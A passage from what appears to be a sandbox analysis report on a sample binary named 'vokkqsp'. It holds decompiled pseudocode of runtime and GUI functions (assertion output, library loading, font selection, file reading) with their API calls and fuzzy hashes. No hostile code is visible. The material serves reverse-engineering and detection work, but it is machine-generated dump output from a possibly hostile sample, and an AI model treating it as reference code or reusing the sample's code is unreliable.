										_pop(__esi);
										__ebx = 0x12010;
										return __eax;
									}
								}
							} else {
								_push(3);
								_t12 = __esi - 0x3b; // 0x44c035
								__eax = _t12;
								__edi = __edi - __eax;
								__eax =  &(0x44c072[__eax]);
								if(__eax != 0) {
									goto L21;
								} else {
									goto L17;
								}
							}
						} else {
							goto L21;
						}
					}
				}
			}


















                                                      0x0040cd3e
                                                      0x0040cd41
                                                      0x0040cd4e
                                                      0x0040ce42
                                                      0x0040ccc5
                                                      0x0040ccc6
                                                      0x0040ccce
                                                      0x0040ccd5
                                                      0x0040ccd8
                                                      0x0040cce1
                                                      0x0040cce5
                                                      0x0040ccec
                                                      0x0040ccef
                                                      0x0040ccf5
                                                      0x0040ccf7
                                                      0x0040ccf9
                                                      0x0040ccff
                                                      0x00000000
                                                      0x00000000
                                                      0x0040cd01
                                                      0x0040cd04
                                                      0x0040cd0a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040cd0a
                                                      0x0040cd0f
                                                      0x0040cd12
                                                      0x0040cd2b
                                                      0x0040cd2b
                                                      0x0040cd3d
                                                      0x0040cd65
                                                      0x0040cd66
                                                      0x0040cd76
                                                      0x0040cd7e
                                                      0x0040cd82
                                                      0x0040ce48
                                                      0x0040ce4d
                                                      0x0040ce52
                                                      0x0040ce53
                                                      0x0040ce58
                                                      0x0040cd88
                                                      0x0040cd88
                                                      0x0040cd8e
                                                      0x0040cd93
                                                      0x0040cd9b
                                                      0x0040cda1
                                                      0x0040cda8
                                                      0x0040cdc1
                                                      0x0040cdc1
                                                      0x0040cdc4
                                                      0x0040cdc4
                                                      0x0040cdc7
                                                      0x0040cdca
                                                      0x0040cdcf
                                                      0x0040cdd1
                                                      0x0040cdd3
                                                      0x0040cdd3
                                                      0x0040cdd9
                                                      0x0040cdfc
                                                      0x0040cdfc
                                                      0x0040ce01
                                                      0x0040ce06
                                                      0x0040ce0b
                                                      0x0040ce17
                                                      0x00000000
                                                      0x0040ce19
                                                      0x0040ce19
                                                      0x0040ce1e
                                                      0x0040ce26
                                                      0x0040ce29
                                                      0x00000000
                                                      0x0040ce2b
                                                      0x0040ce30
                                                      0x0040ce36
                                                      0x0040ce3e
                                                      0x0040ce3f
                                                      0x0040ce41
                                                      0x0040ce41
                                                      0x0040ce29
                                                      0x0040cddb
                                                      0x0040cddb
                                                      0x0040cddd
                                                      0x0040cddd
                                                      0x0040cde0
                                                      0x0040cde2
                                                      0x0040cdfa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040cdfa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040cda8
                                                      0x0040cd82

                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,0044C072,00000104), ref: 0040CD9B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: FileModuleName
                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                      • API String ID: 514040917-4022980321
                                                      • Opcode ID: a6a661e817b794875b2a05743700af23db32c85d893ec53d4f1322b1ac2d334d
                                                      • Instruction ID: 68def1388441484c73e711570d3b26f3fa155b047adb47154ab7ea5044f43d33
                                                      • Opcode Fuzzy Hash: a6a661e817b794875b2a05743700af23db32c85d893ec53d4f1322b1ac2d334d
                                                      • Instruction Fuzzy Hash: BF21F832B40211B2E6311766ACC6FAB265C4BA1758F540137FC08B22D1F6BDCA51C1DD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00422D8F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00422D8F(intOrPtr* _a4, intOrPtr _a8, void* _a12, char _a16) {
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					if( *_t40 != 0) {
						_t7 =  &_a16; // 0x42305e
						_t15 = E00425640( *_t7, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						if(_t15 != 0) {
							_t38 = _a8;
							if(_t15 <=  *((intOrPtr*)(_t38 + 0xc))) {
								L10:
								_t16 = E00424631(_a16, _t40,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)));
								if(_t16 != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t16 - 1;
									_t18 = 0;
								} else {
									E00420DE2(GetLastError());
									_t18 =  *((intOrPtr*)(E00420E3C()));
								}
								L13:
								L14:
								return _t18;
							}
							_t18 = E00422F73(_t38, _t15);
							if(_t18 != 0) {
								goto L13;
							}
							goto L10;
						}
						E00420DE2(GetLastError());
						_t18 =  *((intOrPtr*)(E00420E3C()));
						goto L14;
					}
					_t41 = _a8;
					if( *((intOrPtr*)(_t41 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = 0;
						_t18 = 0;
						 *((intOrPtr*)(_t41 + 0x10)) = 0;
						goto L14;
					}
					_t18 = E00422F73(_t41, 1);
					if(_t18 != 0) {
						goto L14;
					}
					goto L5;
				}
				E00422FAB(_a8);
				return 0;
			}









                                                      0x00422d95
                                                      0x00422d9a
                                                      0x00422db1
                                                      0x00422de0
                                                      0x00422de3
                                                      0x00422ded
                                                      0x00422e06
                                                      0x00422e0c
                                                      0x00422e1a
                                                      0x00422e27
                                                      0x00422e2e
                                                      0x00422e47
                                                      0x00422e4a
                                                      0x00422e30
                                                      0x00422e37
                                                      0x00422e42
                                                      0x00422e42
                                                      0x00422e4c
                                                      0x00422e4d
                                                      0x00000000
                                                      0x00422e4d
                                                      0x00422e11
                                                      0x00422e18
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00422e18
                                                      0x00422df6
                                                      0x00422e01
                                                      0x00000000
                                                      0x00422e01
                                                      0x00422db3
                                                      0x00422db9
                                                      0x00422dcc
                                                      0x00422dcf
                                                      0x00422dd1
                                                      0x00422dd3
                                                      0x00000000
                                                      0x00422dd3
                                                      0x00422dbf
                                                      0x00422dc6
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00422dc6
                                                      0x00422d9f
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ^0B
                                                      • API String ID: 0-3740781799
                                                      • Opcode ID: 91dd452d3aaf18ad5defc7c4a8e5ecc7aaa466805838911f4557f7d511513cc9
                                                      • Instruction ID: 26c99d5c7b0f604a403eb5aa3cd78f8aafc16a3555fb603922295af8ab982944
                                                      • Opcode Fuzzy Hash: 91dd452d3aaf18ad5defc7c4a8e5ecc7aaa466805838911f4557f7d511513cc9
                                                      • Instruction Fuzzy Hash: BC21D431300625BFCB10AF62EE8196B77A8EF40328792452AF915D7221D778EC51D768
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040C84F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E0040C84F(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				void _v1160;
				long _v1164;
				signed int _t12;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr* _t30;
				void* _t33;
				intOrPtr _t35;
				void* _t39;
				signed int _t44;

				_t42 = _t44;
				_t12 =  *0x44b018; // 0x1989d38f
				_v8 = _t12 ^ _t44;
				_t26 = _a8;
				_t35 = _a4;
				_t39 = GetStdHandle(0xfffffff4);
				if(_t39 == 0xffffffff || _t39 == 0 || GetFileType(_t39) != 2 || swprintf( &_v1160, 0x240, L"Assertion failed: %Ts, file %Ts, line %d\n", _t35, _t26, _a12) < 0) {
					L7:
					return E0040361D(_v8 ^ _t42);
				} else {
					_t30 =  &_v1160;
					_t33 = _t30 + 2;
					do {
						_t19 =  *_t30;
						_t30 = _t30 + 2;
					} while (_t19 != 0);
					_v1164 = 0;
					_t32 = _t30 - _t33 >> 1;
					if(WriteConsoleW(_t39,  &_v1160, _t30 - _t33 >> 1,  &_v1164, 0) != 0) {
						E00410889(_t26, _t32, _t33, 0, _t39);
						asm("int3");
						return "Assertion failed: %Ts, file %Ts, line %d\n";
					} else {
						goto L7;
					}
				}
			}














                                                      0x0040c852
                                                      0x0040c85a
                                                      0x0040c861
                                                      0x0040c865
                                                      0x0040c86a
                                                      0x0040c875
                                                      0x0040c87a
                                                      0x0040c8e9
                                                      0x0040c8f7
                                                      0x0040c8ae
                                                      0x0040c8ae
                                                      0x0040c8b6
                                                      0x0040c8b9
                                                      0x0040c8b9
                                                      0x0040c8bc
                                                      0x0040c8bf
                                                      0x0040c8c7
                                                      0x0040c8d3
                                                      0x0040c8e7
                                                      0x0040c8f8
                                                      0x0040c8fd
                                                      0x0040c903
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040c8e7

                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F4), ref: 0040C86F
                                                      • GetFileType.KERNEL32(00000000), ref: 0040C881
                                                      • swprintf.LIBCMT ref: 0040C8A2
                                                      • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000), ref: 0040C8DF
                                                      Strings
                                                      • Assertion failed: %Ts, file %Ts, line %d, xrefs: 0040C897
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: ConsoleFileHandleTypeWriteswprintf
                                                      • String ID: Assertion failed: %Ts, file %Ts, line %d
                                                      • API String ID: 2943507729-1719349581
                                                      • Opcode ID: 99df94fd76ca1cd18ec9d6f20a09407979dfcc160abf30f244c8f1da074730a1
                                                      • Instruction ID: 79401274dc2e7ac959939676f9c4b85bb0d5414f0db8a0a5bc389bfbb69e4ef0
                                                      • Opcode Fuzzy Hash: 99df94fd76ca1cd18ec9d6f20a09407979dfcc160abf30f244c8f1da074730a1
                                                      • Instruction Fuzzy Hash: 4311E6B6500118ABCB20AB29CC859EF7768DB49311F50866AFA16E3280DA349D458BAC
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402051 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00402051() {
				struct %anon40 _v64;
				void _v156;
				void* __edi;
				intOrPtr _t16;
				int _t19;
				int _t21;
				int _t23;
				void* _t25;
				signed int _t27;
				signed int _t29;
				int _t38;

				_t27 = 0x17;
				memcpy( &_v156, 0x44cf20, _t27 << 2);
				_t38 = 0x3c;
				E00403D00(0x44cf20 + _t27 + _t27,  &_v64, 0, 0x44cf20);
				_t16 =  *0x44cf04; // 0x0
				_v64.hwndOwner = _t16;
				_v64.lpLogFont =  &_v156;
				_v64.lStructSize = _t38;
				_v64.Flags = 0x1000041;
				_t19 = ChooseFontW( &_v64);
				if(_t19 != 0) {
					_t25 =  *0x44cf10; // 0x0
					_t21 = CreateFontIndirectW( &_v156);
					_t29 = 0x17;
					 *0x44cf10 = _t21;
					memcpy(0x44cf20,  &_v156, _t29 << 2);
					_t23 = SendMessageW( *0x44cf0c, 0x30,  *0x44cf10, 1);
					if(_t25 != 0) {
						_t23 = DeleteObject(_t25);
					}
					return _t23;
				}
				return _t19;
			}














                                                      0x0040205e
                                                      0x0040206c
                                                      0x0040206e
                                                      0x00402076
                                                      0x0040207b
                                                      0x00402083
                                                      0x0040208c
                                                      0x00402092
                                                      0x00402096
                                                      0x0040209d
                                                      0x004020a5
                                                      0x004020a8
                                                      0x004020b5
                                                      0x004020bd
                                                      0x004020c0
                                                      0x004020d0
                                                      0x004020e0
                                                      0x004020e8
                                                      0x004020eb
                                                      0x004020eb
                                                      0x00000000
                                                      0x004020f1
                                                      0x004020f7

                                                      APIs
                                                      • ChooseFontW.COMDLG32(?), ref: 0040209D
                                                      • CreateFontIndirectW.GDI32(?), ref: 004020B5
                                                      • SendMessageW.USER32(00000030,00000001), ref: 004020E0
                                                      • DeleteObject.GDI32(00000000), ref: 004020EB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: Font$ChooseCreateDeleteIndirectMessageObjectSend
                                                      • String ID: A
                                                      • API String ID: 2123331125-3554254475
                                                      • Opcode ID: 890e82edb277f02319b26f0a062897852de032f8c4ca04ca15964c7c30577fa2
                                                      • Instruction ID: 86fb41d0750ae92146f20a6533270960128cd8a8dbe0021798e7a5681c69aad1
                                                      • Opcode Fuzzy Hash: 890e82edb277f02319b26f0a062897852de032f8c4ca04ca15964c7c30577fa2
                                                      • Instruction Fuzzy Hash: 3B115E76901218ABDB609F61FC89FCABB7DFB06710F044076FA08A72D1DB755948CB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040DF75 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 25%
                                                      			E0040DF75(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0x44b018; // 0x1989d38f
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], E0043FD2C, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0x44039c(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}











                                                      0x0040df8a
                                                      0x0040df95
                                                      0x0040df9b
                                                      0x0040df9f
                                                      0x0040dfaa
                                                      0x0040dfb2
                                                      0x0040dfbc
                                                      0x0040dfc2
                                                      0x0040dfc6
                                                      0x0040dfcd
                                                      0x0040dfd3
                                                      0x0040dfd3
                                                      0x0040dfc6
                                                      0x0040dfd9
                                                      0x0040dfde
                                                      0x0040dfde
                                                      0x0040dfe7
                                                      0x0040dff1

                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,1989D38F,00000000,?,00000000,0043FD2C,000000FF,?,0040DF05,?,?,0040DED9,?), ref: 0040DFAA
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040DFBC
                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,0043FD2C,000000FF,?,0040DF05,?,?,0040DED9,?), ref: 0040DFDE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 6556c08b0c65f96d73fde25f1ec251913a82b5857a85c06094573b17a1135ddb
                                                      • Instruction ID: fb93fa82371f4d0a2de858d828d0567e9af61695c1df0122806b05ac7d3b27e2
                                                      • Opcode Fuzzy Hash: 6556c08b0c65f96d73fde25f1ec251913a82b5857a85c06094573b17a1135ddb
                                                      • Instruction Fuzzy Hash: 0A01D675914619AFDB118F90DC09FAFBBB8FB05B21F004136F813A27E0DB799904CA98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0042A5C1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0042A5C1(WCHAR* _a4) {
				struct HINSTANCE__* _t5;

				_t5 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t5 != 0) {
					return _t5;
				} else {
					if(GetLastError() != 0x57 || E00428702(_a4, L"api-ms-", 7) == 0 || E00428702(_a4, L"ext-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}




                                                      0x0042a5d0
                                                      0x0042a5d8
                                                      0x0042a623
                                                      0x0042a5da
                                                      0x0042a5e3
                                                      0x00000000
                                                      0x0042a620
                                                      0x0042a61f
                                                      0x0042a61f

                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0042A57A), ref: 0042A5D0
                                                      • GetLastError.KERNEL32(?,0042A57A), ref: 0042A5DA
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 0042A618
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID: api-ms-$ext-ms-
                                                      • API String ID: 3177248105-537541572
                                                      • Opcode ID: 99efab121857917dc44ec456727a287a38cc6f77584a8a42bb4d3db68b313d89
                                                      • Instruction ID: b44ff090d3d3fa3c4dbbb57a824ca2c785c95783b836029d1d842e6d4dbd635a
                                                      • Opcode Fuzzy Hash: 99efab121857917dc44ec456727a287a38cc6f77584a8a42bb4d3db68b313d89
                                                      • Instruction Fuzzy Hash: 0BF08231740204B7EB201F61ED07B1D3A559B54B49F640031FE4CA81E1DF7AED30865D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040146D Relevance: 7.6, APIs: 5, Instructions: 63windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 38%
                                                      			E0040146D(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				void* _v524;
				void* _t10;
				intOrPtr _t16;
				void* _t18;
				struct HWND__* _t19;
				unsigned int _t21;
				long _t23;

				_t10 = _a8 - 0x4e;
				if(_t10 == 0) {
					if( *((intOrPtr*)(_a16 + 8)) != 0xfffffda6 ||  *0x44dc6c == 0) {
						L12:
						return 0;
					} else {
						SendMessageW(GetParent(_a4), 0x465, 0,  &_v524);
						_t16 = E00401391( &_v524);
						if(_t16 == 0xffffffff) {
							goto L12;
						}
						_push(0);
						_push(_t16);
						_push(0x14e);
						_push( *0x44ced0);
						 *0x44dc68 = _t16;
						L11:
						SendMessageW();
						goto L12;
					}
				}
				_t18 = _t10 - 0xc2;
				if(_t18 == 0) {
					_t19 = GetDlgItem(_a4, 0x191);
					_push(0);
					_push( *0x44dc68);
					 *0x44ced0 = _t19;
					_push(0x14e);
					_push(_t19);
					goto L11;
				} else {
					if(_t18 == 1) {
						_t21 = _a12;
						if(_t21 == 0x191 && _t21 >> 0x10 == 1) {
							_t23 = SendMessageW( *0x44ced0, 0x147, 0, 0);
							_t24 =  ==  ? 0 : _t23;
							 *0x44dc68 =  ==  ? 0 : _t23;
						}
					}
					goto L12;
				}
			}










                                                      0x00401479
                                                      0x0040147c
                                                      0x004014fd
                                                      0x0040154f
                                                      0x00401554
                                                      0x00401508
                                                      0x00401520
                                                      0x0040152c
                                                      0x00401534
                                                      0x00000000
                                                      0x00000000
                                                      0x00401536
                                                      0x00401538
                                                      0x00401539
                                                      0x0040153e
                                                      0x00401544
                                                      0x00401549
                                                      0x00401549
                                                      0x00000000
                                                      0x00401549
                                                      0x004014fd
                                                      0x0040147e
                                                      0x00401483
                                                      0x004014d8
                                                      0x004014de
                                                      0x004014e0
                                                      0x004014e6
                                                      0x004014eb
                                                      0x004014f0
                                                      0x00000000
                                                      0x00401485
                                                      0x00401488
                                                      0x0040148e
                                                      0x00401499
                                                      0x004014bb
                                                      0x004014c6
                                                      0x004014c9
                                                      0x004014c9
                                                      0x00401499
                                                      0x00000000
                                                      0x00401488

                                                      APIs
                                                      • SendMessageW.USER32(00000147,00000000,00000000), ref: 004014BB
                                                      • GetDlgItem.USER32 ref: 004014D8
                                                      • GetParent.USER32(FFFFFDA6), ref: 00401519
                                                      • SendMessageW.USER32(00000000), ref: 00401520
                                                      • SendMessageW.USER32(0000014E,00000000,00000000), ref: 00401549
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ItemParent
                                                      • String ID:
                                                      • API String ID: 2505470899-0
                                                      • Opcode ID: 7450f268cd2d7d76def50b3fdfa13095f00f6fb07666318cd9b2d6126eca4309
                                                      • Instruction ID: 2ed857e3b27790949f6dfcc2e1ebcd7e38406b0a78d5fdabb359563f47f2c621
                                                      • Opcode Fuzzy Hash: 7450f268cd2d7d76def50b3fdfa13095f00f6fb07666318cd9b2d6126eca4309
                                                      • Instruction Fuzzy Hash: D8219674540316BBDB205F2CDD8DB6A3B66BB05714F500236F916EA2F0D7B49991CA0C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401391 Relevance: 7.6, APIs: 5, Instructions: 54fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E00401391(WCHAR* __ecx) {
				long _v8;
				void _v264;
				int _t11;
				long _t18;
				signed int _t21;
				signed int _t22;
				void* _t23;

				_t23 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0x80, 0);
				_t22 = _t21 | 0xffffffff;
				if(_t23 != _t22) {
					_t18 = GetFileSize(_t23, 0);
					if(_t18 != _t22) {
						_t9 =  <  ? _t18 : 0xff;
						_t11 = ReadFile(_t23,  &_v264,  <  ? _t18 : 0xff,  &_v8, 0);
						_push(_t23);
						if(_t11 == 0) {
							L4:
							CloseHandle();
							goto L1;
						}
						CloseHandle();
						return E004010A1( &_v264, _v8);
					}
					_push(_t23);
					goto L4;
				}
				L1:
				return _t22;
			}










                                                      0x004013b6
                                                      0x004013b8
                                                      0x004013bd
                                                      0x004013cb
                                                      0x004013cf
                                                      0x004013e6
                                                      0x004013f2
                                                      0x004013f8
                                                      0x004013fb
                                                      0x004013d2
                                                      0x004013d2
                                                      0x00000000
                                                      0x004013d2
                                                      0x004013fd
                                                      0x00000000
                                                      0x0040140c
                                                      0x004013d1
                                                      0x00000000
                                                      0x004013d1
                                                      0x004013bf
                                                      0x00000000

                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004013B0
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004013C5
                                                      • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004013D2
                                                      • ReadFile.KERNEL32(00000000,?,000000FF,?,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004013F2
                                                      • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004013FD
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: File$CloseHandle$CreateReadSize
                                                      • String ID:
                                                      • API String ID: 3664964396-0
                                                      • Opcode ID: bb1fcf741a9ca0aed3d8f1185cca1f263be66a26228ed12e4656d0d9339d34eb
                                                      • Instruction ID: 36e5b8c78ff92f1b68859618f1f72a6feb0e118fccf722043412c82db1c232ef
                                                      • Opcode Fuzzy Hash: bb1fcf741a9ca0aed3d8f1185cca1f263be66a26228ed12e4656d0d9339d34eb
                                                      • Instruction Fuzzy Hash: BA01DF75200118BFEB21A764AC88FAF726CEB42355F100236FF46F21E0EA744D514AA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040171B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 90%
                                                      			E0040171B(signed short* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _t23;
				signed short* _t30;
				short _t31;
				int _t34;
				signed short* _t35;
				signed short* _t36;
				long _t37;
				short _t39;
				void* _t40;
				signed int _t41;
				signed int _t44;
				signed int _t45;
				void* _t47;
				signed int _t49;
				void* _t50;
				long _t53;
				signed int _t55;
				void* _t57;
				void* _t58;
				void* _t59;

				_t36 = __ecx;
				_t35 = __ecx;
				_v12 = __edx;
				_v16 = 0x26;
				_t23 = 0;
				_t53 = 0;
				_t49 = 0;
				if( *__ecx == 0) {
					L11:
					_t50 = HeapAlloc(GetProcessHeap(), 0, 2 + _t23 * 2);
					if(_t50 == 0) {
						L25:
						return _t50;
					}
					_t44 = 0;
					_t55 = 0;
					_t37 = 0;
					_v8 = 0;
					if( *_t35 == 0) {
						L24:
						 *(_t50 + _t55 * 2) = 0;
						goto L25;
					}
					_t30 = _t35;
					do {
						_t31 =  *_t30 & 0x0000ffff;
						if(_t37 == 0) {
							if(_t31 != _v16) {
